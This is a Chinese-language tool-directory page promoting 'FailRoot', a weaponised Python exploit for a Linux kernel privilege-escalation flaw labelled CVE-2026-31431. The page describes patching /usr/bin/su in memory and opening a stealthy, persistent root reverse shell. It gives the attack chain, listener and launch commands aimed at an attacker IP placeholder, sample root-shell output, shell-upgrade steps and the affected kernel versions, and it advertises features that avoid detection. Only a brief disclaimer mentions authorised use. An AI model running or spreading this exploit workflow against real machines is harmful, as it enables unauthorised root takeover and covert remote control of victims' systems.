Skip to content
KitploitKITPLOIT
工具漏洞利用博客
Log in
提交
工具漏洞利用博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

订阅源联系隐私© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2026-31431-REVSHELL — 针对 CVE-2026-31431 的武器化 Python 漏洞利用,将 Linux 内核权限提升与守护进程化的 root 反向 Shell 相结合,具备完整 PTY,并在内存中修补 /usr/bin/su。 | Kitploit
工具/GitHubGitHub/danimrtzp/cve-2026-31431-revshell
权限提升漏洞利用框架漏洞分析漏洞利用后渗透利用渗透测试红队Payload 开发

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享
GitHub
danimrtzp/cve-2026-31431-revshell

CVE-2026-31431-REVSHELL

针对 CVE-2026-31431 的武器化 Python 漏洞利用,将 Linux 内核权限提升与守护进程化的 root 反向 Shell 相结合,具备完整 PTY,并在内存中修补 /usr/bin/su。

查看仓库
195个月前尚未审核


  █▀▀ ▄▀█ █ █   █▀█ █▀█ █▀█ ▀█▀
  █▀░ █▀█ █ █▄▄ █▀▄ █▄█ █▄█ ░█░

  CVE-2026-31431  •  Linux 内核 LPE  →  Root 反向 Shell

概述

FailRoot 是一个针对 CVE-2026-31431 的武器化利用程序——该漏洞是 Linux 内核 crypto: algif_aead 子系统中的越界写入。

它将权限提升与守护进程化的 root 反向 Shell(带完整 PTY)串联在一起:

AF_ALG + splice()  →  4 字节页缓存写入  →  修补 /usr/bin/su  →  root

整个利用程序仅包含在一个文件中。无需编译。无外部依赖。磁盘上无痕迹——su 二进制文件仅在内存中被修补。


功能说明

  1. 即时守护进程化 — 双重 fork,与终端分离,立即返回提示符
  2. 加载内核模块 — 通过多种回退策略加载 algif_aead + authencesn
  3. 利用 CVE-2026-31431 — 向 /usr/bin/su 页缓存写入 4 个受控字节
  4. 生成 root PTY 反向 Shell — pty.spawn("/usr/bin/su") → 完全交互式 root TTY

反向 Shell 在终端关闭后依然存活(忽略 SIGHUP),在目标上不显示任何输出,并在最多 3 分钟内持续重试连接。


使用方法

# 攻击者 — 启动监听器:
nc -lvnp 4444

# 目标 — 运行利用程序(不会显示任何内容,它会立即守护进程化):
python3 exploit.py <ATTACKER_IP> 4444
attacker ~ $ nc -lvnp 4444
listening on [any] 4444 ...
connect to [192.168.1.100] from [192.168.1.50] 50234

root@victim:~# id
uid=0(root) gid=0(root) groups=0(root)

TTY 升级(攻击者侧,在 Shell 内部)

Ctrl+Z
stty raw -echo; fg
reset
export TERM=xterm-256color
export SHELL=/bin/bash

受影响的内核版本

起始版本结束版本(不含)
4.145.10.254
5.115.15.204
5.166.1.170
6.26.6.137
6.76.12.85
6.136.18.22
6.196.19.12
7.0rc1–rc6

环境要求

  • Python >= 3.10(os.splice())
  • 对 /usr/bin/su 具有读取权限(所有发行版上均为全局可读)
  • 内核模块 algif_aead 和 authencesn 可用
  • 无需 sudo

作者

danimrtzp


免责声明

仅限授权的安全研究和教育用途。滥用属违法行为。

下载工具